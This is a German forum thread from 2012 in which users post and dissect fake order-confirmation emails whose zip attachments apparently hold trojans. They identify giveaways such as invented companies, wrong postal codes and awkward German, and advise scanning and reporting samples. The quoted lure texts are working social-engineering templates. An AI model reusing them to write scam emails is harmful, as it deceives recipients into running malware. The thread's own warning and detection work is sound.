From - Wed May 02 xx:xx:xx 2012
X-Account-Key: account2
X-UIDL: [UID filtered]
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
X-Envelope-From: <fmwpn369 [at] ybb.ne.jp>
X-Envelope-To: <^^@^^^^.^^>
X-Delivery-Time: 1335934685
X-UID: [UID filtered]
Return-Path: <fmwpn369 [at] ybb.ne.jp>
X-RZG-FWD-BY: ^^@^^^^.^^
Received: from mailin.rzone.de (jored mi73) ([unix socket])
by mailin.rzone.de (jored mi73) (RZmta 28.16) with LMTPA;
Wed, 2 May 2012 xx:xx:xx +0200 (CEST)
X-RZG-CLASS-ID: [ID filtered]
Received: from ybbsmtp506.mail.kks.yahoo.co.jp ([183.79.29.145])
by mailin.rzone.de (jored mi73) (RZmta 28.16 OK)
with SMTP ID: [ID filtered]
Wed, 2 May 2012 xx:xx:xx +0200 (CEST)
Received: (qmail 35967 invoked by alias); 2 May 2012 xx:xx:xx -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ybb.ne.jp; s=ybb20110701; t=1335934673; bh=VZI9eoTBW1s6g5zJxXFFj7ScqOELRXVJ/FVkZxTXAwc=; h=Received:X-Apparently-From:MIME-Version:Date:X-Priority:X-Mailer:Subject:From:To:Content-Type:Message-ID; b=EFzujUo2S9ahqvFtVlI2W0fPuYIN0HP4NwcnxRFwq1SzacL/49eku6PdQTKb4sMFleFa8n1sOR9dkCQCCLceQVAHbKMyc9LjBs0MeqxTcPYmDxRikFc1+/LzTNkqLWCGMmxjRIaxtffPU8gXMB2GQrxNvKKDuPz5QP+y0v1Cl8g=
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=ybb20110701; d=ybb.ne.jp;
h=Received:X-Apparently-From:MIME-Version:Date:X-Priority:X-Mailer:Subject:From:To:Content-Type:Message-ID;
b=KcFcXAeZPZyZuohOUd3Beeslo84uqLNIhu6XnfHoznNqf+u6N3r+vJKlWXK8//HVr4I+vv7/5trpcQTU2lLevnstEhWMh3YinBaBYTwI8nSpr5Bw8TiA2tycqNK34yn2XAR4b2pCpnujDFhTMKryLJSK odMvHUYhjiGHlnI9rjQ= ;
Received: from unknown (HELO servidor) (87.216.166.244 with login)
by ybbsmtp506.mail.kks.yahoo.co.jp with SMTP; 2 May 2012 xx:xx:xx -0000
X-Apparently-From: <dreamsykyk [at] yahoo.co.jp>
MIME-Version: 1.0
Date: Wed, 02 May 2012 xx:xx:xx +0200
X-Priority: 3 (Normal)
X-Mailer: Mailman v2.0.8
Subject: Neue Bestellung 510397699 D. Kl??r
From: fmwpn369 [at] ybb.ne.jp
To: "D. Kl??r" <^^@^^^^.^^>
Content-Type: multipart/mixed;
boundary="-----_chilkat_dfe_08c1_d564d53b.9455f1d8_.MIX"
Message-ID: [ID filtered]

Verehrte(r) D. ee??kay,

vielen Dank für Ihre Bestellung bei Rtlshop.de, nachfolgend finden Sie Ihre Bestellbestätigung.

Deine Bestellnummer 06870982542
Artikel: Sony 7648524831 850,45 Euro
Rechnungsname: D. ee??kay
Zahlungsmethode: Paypal

Versandadresse und detaillierte Vertragsdetails finden Sie im Anhang.

Die Zahlung wurde autorisiert und wird innerhalb 2 Tage entzogen.
Kaufeinzelheiten und Widerspruch Möglichkeiten finden Sie in beigefügtem Anhang.


Ihr Kundenservice

Alster GmbH
................
............ ...............

Telefon: (+49) ........................
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Stuttgart
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: A.V.

Im Anhang findet sich eine zip Datei in der sicherlich ein kleiner Trojaner lauert. Da ich nicht weiss ob die Alster GmbH existent ist habe ich das anonymisiert. Hier ist noch eine Mail dieser Art:

From - Wed May 02 xx:xx:xx 2012
X-Account-Key: account2
X-UIDL: [UID filtered]
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
X-Envelope-From: <jlham [at] iinet.net.au>
X-Envelope-To: <^^^^^^^^^^>
X-Delivery-Time: 1335922989
X-UID: [UID filtered]
Return-Path: <jlham [at] iinet.net.au>
X-RZG-CLASS-ID: [ID filtered]
Received: from outbound.icp-qv1-irony-out4.iinet.net.au ([203.59.1.104])
by mailin.rzone.de (joses mi156) (RZmta 28.16 OK)
with ESMTP ID: [ID filtered]
Wed, 2 May 2012 xx:xx:xx +0200 (CEST)
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: AilqAI6QoE8/51wQ/2dsb2JhbABEgg+DLIVjlwiMb2WDAoEHggQBEwEBTQEuCAIBEDsSAQREHQECAwGFNweCKBaZKKBsE4Yxi kQEiDA0hhOBIxOLaQOKJ4MH
X-IronPort-AV: E=Sophos;i="4.75,515,1330876800";
d="exe'96?zip'96,48?scan'96,48,208,48,96";a="32742151"
Received: from unknown (HELO server) ([63.231.92.16])
by outbound.icp-qv1-irony-out4.iinet.net.au with ESMTP/TLS/RC4-MD5; 02 May 2012 xx:xx:xx +0800
MIME-Version: 1.0
Date: Tue, 01 May 2012 xx:xx:xx -0600
X-Priority: 3 (Normal)
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
Subject: =?iso-8859-1?Q?Lieferschein_f=FCr_Herr_Daniel_Kl=3F=3Fr?=
From: jlham [at] iinet.net.au
To: "Herr D^^^^ Kl??r" <^^^^^^e>
Content-Type: multipart/mixed;
boundary="-----_chilkat_0b5_eae2_1ce6587a.b2ee3c5b_.MIX"
Message-ID: [ID filtered]


Verehrte(r) Herr Dee??kay

vielen Dank für Ihre Bestellung bei schlecker.de, nachfolgend finden Sie Ihre Bestellbestätigung.

Ihre Bestellnummer 20610793778
Artikel: Apple 3873050018 699,13 Euro
Rechnungsname: Herr Dee??kay
Zahlungsmethode: Paypal

Versandadresse und detaillierte Vertragsdetails finden Sie im Anhang.

Die Zahlung wurde autorisiert und wird innerhalb 2 Tage entzogen.
Rechnungsauflistung und Widerspruch Mitteilung finden Sie im Anhang.


Ihr Supportteam

Konsolenprofis GmbH
..........
........ ...........

Telefon: (+49) ...................
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Keiserslauter
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: F. S.

Ist :suspect:. Das Deutsch ist holprig, keine ernstzunehmende deutsche Firma des Versandhandels würde "Geld entzogen" schreiben, wenn eine Lastschriftbuchung gemeint ist. Die Summen jenseits von 500 Euro und der Verweis auf die Widerrufsöglichkeit im Anhang sollen den Selektionsdruck erhöhen. Eine Bestätigungsmail vom RTLShop sieht anders aus, das kann ich sicher sagen. Das gilt vermutlich auch für die Konsolenprofis.

Du kannst die Zip-Datei bei einem Online-Virenscanner einwerfen, dann hast Du Gewissheit, dass es sich um einen Trojaner handelt. Mich würde interessieren, welchen. Ich nehme als Scanner gerne http://www.virustotal.com.

Irgendwie passen die Webadressen überhaupt nicht zur Signatur: Schlecker und Konsolenprofis, RTLShop und Alster GmbH.

Passen tut da garnichts. ie Alster GmbH soll in München sitzen, ist aber per google nicht auffindbar. die Konsolenprofis gibt es und die sitzen in Lüneburg

Gesellschaftssitz ist Keiserslauter

wie niedlich, eine "Firma" die nicht mal weiß wie man ihren Geschäftssitz scheibt :-)

Andere Variante:
Bestellung bei Computeruniverse.de
Artikel: Samsung 3134586584 653,12 Euro
Rechnungsname: mein Vor- und Nachname
Zahlungsmethode: Paypal (na klar, sollen sie mal abbuchen - bin bei Paypal nicht mal registriert)
Kundenservice einer Firma in "Hermannstal 46, 89801 Stuttgart"
(nicht mal Postleitzahl und Ort passen)

Konsolenprofis GmbH
..........
........ ...........

Telefon: (+49) ...................
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Keiserslauter


Komisch, den Ort Keiserslauter kannte bisher noch nicht.
Egal, ist ja eh alles nur gefakt.
Die Firmen (Konsolenprofis GmbH und Alster GmbH) sind nicht existent.
Deshalb fehlen wohl auch die HRB-Nummern im Impressum.

hab soeben auch eine solche mail bekommen und mein antivirenprogramm hat auch gleich selber den troyaner erkannt und isoliert
den ahnhang habe ich nicht geöffnet aber der inhalt der mail lautet:

ach und was noch intressant ist das unter angegebener artikelnr. bei otto.de ein "GIESSWEIN, Hausschuh, »Kramsach«
ab € 24,90" zu finden ist :) ...und die postleitzahl ist in deutschland nicht auffindbar




Hallo xxxx xxxx,

vielen Dank für Ihre Bestellung bei Otto.de, nachfolgend finden Sie Ihre Bestellbestätigung.

Deine Bestellnummer 33963187787
Artikel: Nokia 4854843168 679,22 Euro
Rechnungsname: xxxx xxxx
Zahlungsmethode: Bankeinzug

Versandadresse und detaillierte Vertragseinzeilheiten finden Sie im Anhang.

Die Zahlung wurde autorisiert und wird innerhalb 2 Tage abgetragen.
Bestellauflistung und Widerruf Hinweise finden Sie im zugefügten Ordner.


Ihr E-Mail-Support

Konsolenprofis GmbH
Horner Stieg 69
41904 Dortmund

Telefon: (+49)...........
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr) Gesellschaftssitz ist Bremen
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: R. M.

Habe ebenfalls folgende Nachricht erhalten:

Received: from mail.btconnect.com ([213.123.26.188]) by xx
Tue, 1 May 2012 xx:xx:xx -0700
Received: from nsc69.38.51-10.newsouth.net (EHLO server.Ozment.local) ([69.38.51.10])
by c2beaomr10.btconnect.com
with ESMTP ID: [ID filtered]
Wed, 02 May 2012 xx:xx:xx +0100 (BST)
MIME-Version: 1.0
Date: Wed, 02 May 2012 xx:xx:xx -0500
X-Priority: 3 (Normal)
X-Mailer: Apple Mail (2.552)
Subject: Ihre Bestellung 718513xxx xxxxxxx
From: kbdraper [at] btconnect.com
To: "x" <x>


Guten Tag xxxx xxxx,

vielen Dank für Ihre Bestellung bei Otto.de, nachfolgend finden Sie Ihre Bestellbestätigung.

Ihre Bestellnummer 41924852xxx
Artikel: Sony Vaio 5062346699 715,87 Euro
Rechnungsname: xxxx xxxx
Zahlungsmethode: Bankeinzug

Versandadresse und detaillierte Zahlungsdetails finden Sie im Anhang.

Die Zahlung wurde autorisiert und wird innerhalb 2 Tage entzogen.
Rechnungsdetails und Storno Möglichkeiten finden Sie im zugefügtem Zip Ordner.


Ihr Support

Walddorf GmbH
Derbyweg 46
40541 München

Telefon: (+49) 900 3301326
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Keiserslauter
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: E. V.

...und ich kann mich vor Anfragen mit Forderungsabwehr kaum retten - "hab nichts bestellt, weisen Sie die in die Schranken!".
Rund die Hälfte der Betroffenen hat die Anhänge geöffnet. Immerhin war die andere Hälfte vorsichtig genug.

http://www.heise.de/newsticker/meldung/Kriminelle-locken-mit-gefaelschten-Rechnungen-in-die-Virenfalle-1566365.html

Moin zusammen,

genau den Mist habe ich auch grade bekommen.
Die Umsatzsteuer-ID: [ID filtered]

Und dann noch >>>Dein Lieferschein Nr. 11653858,
ich wüsste nicht, denen das Du angeboten zu haben.:p

Und natürlich die Zipdatei im Anhang.
Die VZ warnt auch davor. http://www.vz-nrw.de/UNIQ133604221117345/trojaner-im-anmarsch-vorsicht-vor-e-mail-mit-gefaehrlichem-zip-anhang

Grüße
Frechdachs



Guten Tag sehr geehrte/r Kunde,

Danke für Ihre Bestellung bei hichrono.de, nachfolgend finden Sie Ihre Vertragsbestätigung.

Ihre Transaktionsnummer: 049649563860
Artikel: Samsung 3495648195 957,23 Euro

Zahlungsmethode: Bankeinzug

Rechnungsname, Versandadresse und detaillierte Zahlungsdetails finden Sie zwecks Securitymassnahmen im Anhang.

Die Buchung wurde autorisiert und wird innerhalb 4 Tage entzogen.
Rechnungseinzelheiten und Stornierung Möglichkeiten finden Sie in beigefügtem Anhang.


Ihr Kundensupport

Ixxen GmbH
Horner Stieg 65
89290 Kiel

Telefon: (+49) 561 1110871
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Augsburg
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: F.S.
Return-Path: <jbrophy [at] suddenlink.net>
Received: from txofep02.suddenlink.net (txofep02.suddenlink.net [208.180.40.72])
by mtain-me03.r1000.mx.aol.com (Internet Inbound) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Thu, 3 May 2012 xx:xx:xx -0400 (EDT)
Received: from proxy.sucasaproduce.com ([67.212.206.166])
by txofep02.suddenlink.net
(InterMail vM.8.04.00.01 201-2329-100-103-20120206) with ESMTP
ID: [ID filtered]
for <poor [at] spamvictim.tld>; Thu, 3 May 2012 xx:xx:xx -0500
MIME-Version: 1.0
Date: Thu, 03 May 2012 xx:xx:xx -0700
X-Priority: 3 (Normal)
X-Mailer: Ximian Evolution 2.3.1 (2.0.1-6)
Subject: Dein Lieferschein Nr. 11653858
From: jbrophy [at] suddenlink.net
To: poor [at] spamvictim.tld
Content-Type: multipart/mixed;
boundary="-----_chilkat_fcc_2c42_3777b999.7ff23d93_.MIX"
Message-ID: [ID filtered]
X-Cloudmark-Analysis: v=1.1 cv=e4+nN7JFyidPqtjm7QRibqntUT6DPKhMpvIMSrLb7TA= c=1 sm=0 a=xzW3HwPJiLYA:10 a=dyzuP2Gy4iEA:10 a=TF_aTyEftx2he4c34eEA:9 a=wPNLvfGTeEIA:10 a=yCCnGPpD6nYA:10 a=c-rcnhRYuesxVovy9O0A:9 a=IKIoO-ieCDEA:10 a=HpAAvcLHHh0Zw7uRqdWCyQ==:117
x-aol-global-disposition: G
X-AOL-VSS-INFO: 5400.1158/80522
X-AOL-VSS-CODE: clean
X-AOL-SCOLL-SCORE: 0:2:212851728:93952408
X-AOL-SCOLL-URL_COUNT: 0
x-aol-sID: [ID filtered]
X-AOL-IP: 208.180.40.72
X-AOL-SPF: domain : suddenlink.net SPF : none
X-Antivirus: avast! (VPS 120503-0, 03.05.2012), Inbound message
X-Antivirus-Status: Clean

Irgendwie bringen DIE aber die Postleitzahlen ganz schön durcheinander! :) :)

4xxxx für München, 89xxx für Kiel und auch hier 81xxx für Bremen:

http://www.gutefrage.net/frage/schon-wieder-betrug

Postleitzahlen, Artikelnummern und Firmen sind irrelevant. Einzig wichtig ist die recht hohe "Rechnungs"summe. Die soll erst mal schocken und zum schnellen Klick auf den Anhang verleiten. Das ist das Ziel der Spammer.

Das stimmt leider! Ich habe auch erst später gemerkt, dass die Postleitzahl gar nicht zum Ort passt.

Hallo, ich habe heute folgende seltsame Mail erhalten:

Von: dad4christ [at] suddenlink.net
An: ........
Betreff: Anmeldebeitrag Ihrer Bank-Karte
Datum: Tue, 08. May 2012 xx:xx:xx

Hallo lieber Kunde/Kundin,

wir sind höchst erfreut Ihnen mitteilen zu können, das Ihr Karten-Antrag bearbeitet wurde. Sie erhalten Ihre Karte in den nächsten Tagen, Ihre Pin wird separat zugestellt. 129,49 Euro für 24Monate Mitgliedsbeitrag werden Ihnen in Kürze von Ihrem Bankkonto abgeschrieben. Ihr Kartenlimit ist auf 3000 Euro gesetzt. Rechnungsauflistung finden Sie in Beilage.

Zeitman GmbH
Rattenweg 98
57013 Biedenkopf

Telefon: (+49) 181 9183305
(Mo-Fr 8.00 bis 18.00 Uhr| Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Köln
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: J* M*


angehängt ist ein zip-file, dass eine datei "Auszug.exe" enthält. Ich habe die Datei mit Avast und malwarebytes geprüft, beide sagen sauber. Trotzdem ist das eindeutlig was spammiges, da das eine executable ist. Ist auch vom Spamfilter meines Emailclients ausgefiltert worden.

Kann jemand was dazu sagen bzw. weiss jemand was das ist? In Google war unter dem Stichwort "Zeitmann Gmbh" nichts zu finden, scheint also was ganz neues zu sein

Schöne Grüße

Tom

Willkommen im Forum!

Bitte mal den Header der Mail posten.

Danke.

Bitte mal den Header der Mail posten.

Danke.

wollte ich auch tun, weiss nur nicht wie man den bei GMX anzeigt. weist du, wie ich den vollständigen Header bei GMX angezeigt kriege? Unter Optionen habe ich nichts gefunden...

Das Symbol oben rechts über "ins Adressbuch" anklicken.

Neben dem Symbol "Speichern" und "Drucken".

Danke, habs gefunden. Hier isser:

Return-Path: <dad4christ [at] suddenlink.net>
Delivered-To: GMX delivery to ...... [at] gmx.net
Received: (qmail invoked by alias); 08 May 2012 xx:xx:xx -0000
Received: from txofep01.suddenlink.net (EHLO txofep01.suddenlink.net) [208.180.40.71]
by mx0.gmx.net (mx076) with SMTP; 08 May 2012 xx:xx:xx +0200
Received: from server ([212.142.226.177]) by txofep01.suddenlink.net
(InterMail vM.8.04.00.01 201-2329-100-103-20120206) with ESMTP
ID: [ID filtered]
for <...... [at] gmx.net>; Tue, 8 May 2012 xx:xx:xx -0500
MIME-Version: 1.0
Date: Tue, 08 May 2012 xx:xx:xx +0200
X-Priority: 3 (Normal)
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
Subject: Anmeldebeitrag Ihrer Bank-Karte
From: dad4christ [at] suddenlink.net
To: ....... [at] gmx.net
Content-Type: multipart/mixed;
boundary="-----_chilkat_7cb_85db_a8546dc7.1029e2a5_.MIX"
Message-ID: [ID filtered]
X-Cloudmark-Analysis: v=1.1 cv=6p5BqBp3VK6p0jBnMk5o/Dt6mLrqbqrhBjCrXBaOSr4= c=1 sm=0 a=tRQK8EYLUZkA:10 a=xzW3HwPJiLYA:10 a=rTN5Y5ykDHAA:10 a=ivsTrB8WoHAA:10 a=RdVfM2mDbkQdFVvfaYQA:9 a=wPNLvfGTeEIA:10 a=_W_S_7VecoQA:10 a=5tOV--oKambfLiWg1AcA:9 a=IKIoO-ieCDEA:10 a=HpAAvcLHHh0Zw7uRqdWCyQ==:117
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: 5 (eXpurgate);
Detail=5D7Q89H36p7RD0ZwpkL6+eQgmvCvQtD8m3P+GXPd9c9SJtGqry75twFzJR8y+togC8CdC
YISqohvp6/BH8TJIxyx67CyTLu1Otn61+PIYk5Vl9O9ffqxWMD7DkBhyr1RuMvMIOYDM8OvEQ5tB
MWv3AGcdBJ128o6CscpWCFeq2NbWUG9yK3rWrLB9pW2i4OhkEdsiEmVuPXPIGhGamHPmQ==V1;
X-GMX-UID: [UID filtered]
X-Flags: 1401

Zeitman GmbH
Rattenweg 98
57013 Biedenkopf
Der Name der angeblichen GmbH und die Adresse ist freie Erfindung

Biedenkopf hat die PLZ 35216 und den Ungezieferweg gibt es dort nicht

Der Name der angeblichen GmbH und die Adresse ist freie Erfindung

Biedenkopf hat die PLZ 35216 und den Ungezieferweg gibt es dort nicht

dachte ich mir, klang gleich komisch.

@ wahwah: das anonymisieren des GF-Names in meinem ersten Post war wahrscheinlich unnötig, der dürfte auch frei erfunden sein...

Mich würde vor allem interessieren, was die exe-file tut, wenn mann doof genug ist sie zu öffnen. Warum sagen meine antivirenprogramme dazu nichts? Ich denke mal das ist nur etwas bekanntes in neuem Kleid?

Warum sagen meine antivirenprogramme dazu nichts?
Der Absender wird seine Schadware so verfasst haben, dass die gängigen Virenprogramme nicht darauf anschlagen. Deshalb ist es wichtig, die Mail möglichst sofort einem Virenscanner-Hersteller zu schicken.

Dein Virenscanner-Hersteller hat bestimmt eine E-Mail-Adresse, an die man ihm das Zeug schicken kann. McAfee möchte solche E-Mails eingezippt und mit dem Passwort "suspect" verschlüsselt erhalten. Einzippen und Verschlüsseln ist wichtig, damit die Schadware nicht versehentlich gestartet werden kann.

Fackle nicht lang - jeder Tag Zögern erhöht die Opferzahl.

Wenn dein Virenscanner regelmäßig upgedatet wird, aber auch in einer Woche nicht anschlägt, solltest du dir einen anderen besorgen. Die Mail stinkt heftig nach Schadware.

Wuschel

Scheint eine Variante hiervon zu sein: <schnipp> Getackert, danke für den Hinweis

D. Deshalb ist es wichtig, die Mail möglichst sofort einem Virenscanner-Hersteller zu schicken.

Dein Virenscanner-Hersteller hat bestimmt eine E-Mail-Adresse, an die man ihm das Zeug schicken kann. .

Wuschel

habe ich getan und das ding an Avast! geschickt! Danke für den Hinweis!

Es gab übrigens mal eine Zeitmann GmbH (http://books.google.de/books?id=sD5lWtYMwBEC&pg=PA122&lpg=PA122&dq=%22Zeitmann+GmbH%22&source=bl&ots=zndd4LP3OF&sig=FzkwVnstYwXje50-tKH0xBQRLkU&hl=de&sa=X&ei=hImpT9SmGIbCtAaiyIlv&sqi=2&ved=0CCMQ6AEwAA#v=onepage&q=%22Zeitmann%20GmbH%22&f=false) aber das ist über 10 Jahre her
und außerdem in Mannheim ...

E-Mail mit Zip.Datei als Anhang

From: - Tue May 08 xx:xx:xx 2012
X-Account-Key: account3
X-UIDL: [UID filtered]
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <***>
Received: from [82.235.199.161] (mer76-1-82-235-199-161.fbx.proxad.net [82.235.199.161]) by mail.bghosting01.de with SMTP; Tue, 8 May 2012 xx:xx:xx +0200
Message-ID: [ID filtered]
From: niall wilfred <***>
To: <info@*********.de>
Subject: Re:Zahlung
Date: 8 May 2012 xx:xx:xx +0100
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="---B31C6B812EC4F6C46B1CF659B381B31C"
X-Mailer: Weuvjqn eiupjf
X-SmarterMail-Spam: SPF_None, SORBS - Dynamic IP, UCEProtect Level 1, Bayesian Filtering, ISpamAssassin 0 [raw: 0], DK_None, DKIM_None
X-SmarterMail-TotalSpamWeight: 8
X-AntiVirus: checked (incoming) by AntiVir MailGuard (Version: 10.0.1.42; AVE: 8.2.10.62; VDF: 7.11.29.114)



Verehrte(r) Kunde/Kundin,

Ihr Account wurde aktiviert.
692,44 Euro Teilnehmerbeitrag ist ab sofort zu begleichen.

Die Bezahlung wird innerhalb 2 Tagen abgebucht.
Sie werden in nächsten Tagen angerufen und ein Lieferzeitpunkt wird ausgemacht.
Bestelleinzelheiten und Stornierung Erklärung finden Sie im Zusatzordner in der E-Mail.

Aurea GmbH
Bergmannring 02
60307 Keiserslauter

Telefon: (+49) 056 9244045
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Ahrensburg
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: ***

E-Mail mit Zip.Datei als Anhang
Ist (nach Vermutung einiger Experten) ein ziemlich übler Trojaner, der sich per Social Engineering zu verbreiten sucht. Den Anhang bitte auf keinen Fall öffnen! Zur Zeit feuern die aus allen Rohren, ich habe das an den passenden Thread angehängt und Deinen Beitrag anonymisiert.

Dass der Virenscanner von GMX allerdings ruhig bleibt, ist mir ein Rätsel. Diese Masche wird im deutschsprachigen Raum seit wenigen Tagen derart massiv gefahren, dass man schon eine gute Heuristik alleine für einen Wortfilter hätte.

Schönen Gruß
Mittwoch

Mich würde vor allem interessieren, was die exe-file tut, wenn mann doof genug ist sie zu öffnen. Warum sagen meine antivirenprogramme dazu nichts? Ich denke mal das ist nur etwas bekanntes in neuem Kleid?

@ToHo: da kann ich dir sagen meinem Bruder ist das passiert, erst geschieht einfach nix und nach ca 10-15 min wird dein Rechner "Gesperrt" wegen krimineller inhalte, Pornographischen inhalten etc....

Hier sollst du noch mals 100 Euro bezahlen um die sperre wieder aufzuheben. Da hat nur ein Virenscann geholfen

Hallo, liebe User, bin hier neu im Forum, habe leider wenig Ahnung von Hard- und software.
Habe in den vergangenen 3 Tagen auch schon 2 Spammailes erhalten von "flaviolink [at] oul.com.br. (Absender Konsoleprofis Bremen, Zwischenhändler cyberport - PLZ und Tel.-Nr. waren auch nicht korrekt.
Nun habe ich dummerweise den Anhang geöffnet bei der ersten Mail. Wie gefährlich ist das? Ich mache kein Onlinebanking.
Habe später erst mit einem Virenprogramm "spybots " den Rechner durchlaufen lassen,es fand 2 Cookies bei den Internetbrowsern "Chrom und "Explorer", die ich dann löschte.
Leider kenne ich mich gar nicht aus.
Die 2. Mail dieser Art habe ich ungelesen gleich gelöscht.
Nun lese ich hier etwas von "anonymisieren" - wie macht man das?
Auch die Kopfzeile einer Mail, wo sich die IP oder ID: [ID filtered]

Vielen Dank im voraus.
Katzina
Eigentlich sollte das eine Frage werden, finde aber im Forum nicht die Stelle, wo man eine Frage stellen kann, sorry.

Hallo Katzina,

bitte folge dieser Anleitung und poste das Ergebnis hier:

http://www.trojaner-board.de/51130-anleitung-hijackthis.html

angehängt ist ein zip-file, dass eine datei "Auszug.exe" enthält. Ich habe die Datei mit Avast und malwarebytes geprüft, beide sagen sauber.

Im ZIP-File verpackt, da die Datei damit an vielen Virenscannern vorbei kommt. Mit Sicherheit ist ein Schädling enthalten, auch wenn die Scanner ihn (noch) nicht erkennen! Finger weg von der Datei!

Hallo

Ich hab auch was in meinem Spamordner gefunden.

Hier mal der erweiterte Header:
(Meine Mailadresse habe ich herausgelöscht.)
Erweiterte E-Mail Informationen
Return-Path: whskagn0720 [at] naver.com
Received: from tmailpost19-2.nm.naver.com ([114.111.39.71]) by mx-ha.web.de (mxweb005) with ESMTP (Nemesis) ID: [ID filtered]
Received: from [114.111.32.200] ([114.111.32.200]) by tmailpost19-2.nm.naver.com ([10.25.246.50]) with ESMTP ID: [ID filtered]
Received: from [61.33.11.18] ([61.33.11.18]) by a51506.nm.naver.com ([202.131.27.107]) with ESMTP ID: [ID filtered]
MIME-Version: 1.0
Date: Fri, 18 May 2012 xx:xx:xx +0900
X-Priority: 3 (Normal)
X-Mailer: The Bat! (v2.00.3) Personal
Subject: Artikelbestellung 2687021796
X-TERRACE-DUMMYSUBJECT: Terrace Spam system *
X-TERRACE-DUMMYSUBJECT: Terrace Spam system *
From: whskagn0720 [at] naver.com
To:
Content-Type: multipart/mixed; boundary=-----_chilkat_782_3a57_00e62da5.555eeceb_.MIX
Message-ID: [ID filtered]
X-TERRACE-SPAMMARK: NOT spam-marked. (by Terrace)
X-TERRACE-SPAMMARK: NOT spam-marked. (by Terrace)
Envelope-To: <>
X-UI-Filterresults: ;V01:K0:If3bsETF:fs2Sm3bK86F8MvrBVdJ7cevwGYHtTu22nAq lDsy+FuBPwKNKYA0+csds/X7VV+tj3pNIcu98jLBGZUQTCFS0c6cAY8jyu3ggOSOi2zH+ZV ue6iqOfrZWFLDf6L7JnfrVRhOwpcpWUBukLPvPm0IOjNibK53E+21ETxNU4RKLHTco/CJ8s 1RIhjV0aWn0nJoGzov1uZ9P9sFvEl147FaRa6kzrZQX87U20WI4Odr1VvpAyw+KWSq8ZvZv rkqJOy1y/JlXqVQJxVgWecBp/L9Lno2ODz/oJCO/RXNhv239Uew=
Ordner: Spam
Größe: 42 KB


Das ist der Text:


Sehr geehrte Damen und Herren,

Besten Dank für Ihren Kauf bei Mall73, nachfolgend finden Sie Ihre Bezahbestätigung.

Deine Vertragsnummer: 158849547687
Artikel: DWL-ANTK240500 6083499685 5192,67 Euro
Rechnungsname: Wie in Rechnungsdaten dargestellt


Zahlungsmethode: Mastercard

Versandadresse und detaillierte Rechnung finden Sie aus Sicherheitsgründen in beigefügter Datei.

Die Zahlung wurde autorisiert und wird innerhalb 4 Tage entzogen.
Bezahleinzelheiten und Stornierung Hinweise finden Sie im zugefügtem Zip Ordner.


Ihr Kundenberater

Jäger GmbH
Billufer 11
77309 Keiserslauter

Telefon: (+49) 540 9302353
(Mo-Fr 8.00 bis 19.00 Uhr, Sa 9.00 bis 19.00 Uhr)
Gesellschaftssitz ist Alsfeld
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: ***

Was ich gefunden habe: einen Webshop mit dem namen Mall73, gibt es tatsächlich.
Jäger GmbH's gibts auch mehrere.
Von der Zip Datei werde ich gepflegt die Finger lassen.
Web.de erkennt aktuell die Mail als Spam, aber die Zipdatei, wird als sauber angezeigt.
Trotzdem sollte sich jeder Hütten das Teil zu öffnen.

Heute hab ich eine Email mit einem Anhang "Mitgliedschaft.zip", die eine Datei "Mitgliedschaft Mai 2012.pif" enthält (weiter unten dann der Quelltext des Headers). Ich hab mich natürlich gehütet, die Datei zu öffnen, hab aber mit einem Viewer in die zip.-Datei geschaut. Im Quelltext hab ich meine persönlichen Infos mit "§" ersetzt.
Kennt das jemand?
Hier ein anderes Opfer mit ähnlichem Text:
http://www.sellerforum.de/internet-sicherheit-f56/virus-in-zip-anhang-bei-angeblicher-premium-mitgli-t27180.html

Hier der Originaltext meiner Mail:



Guten Tag sehr geehrter Kunde,

Sie haben heute bei TrefflichTropfen die Premiummitgliedschaft gekauft. Die Zahlung in Höhe von 288,59 EUR wird in den kommenden Tagen von Ihrem Bankkonto entzogen.

Sie sind jetzt für die nachfolgenden 6 Monate Star-Kunde und können in vollem Umfang die Premiumleistungen nutzen.

Zahlungsdetails sind zwecks Vorsichtsmassnahmen laut dem §§ 3g, 5b BDSG, aus der beigefügter Datei zu konrollieren.
Die Kündigung der Extradienste, ist mit der in Beilage angefügten Stornierung an Robin [at] Schwarz-anwalt.ch zu mailen.

Ihr Kundensupport

Lehmann GmbH
Blostwiete 09
67513 Kiel

Tel.: (+49) 305 72351917
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 9.00 bis 17.00 Uhr)
Ort: Aurich
Steuer-ID: [ID filtered]


Qeulltext:

From - Fri May 18 xx:xx:xx 2012
X-Account-Key: account10
X-UIDL: [UID filtered]
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <svalderr [at] aecom.yu.edu>
Delivery-Date: Fri, 18 May 2012 xx:xx:xx +0200
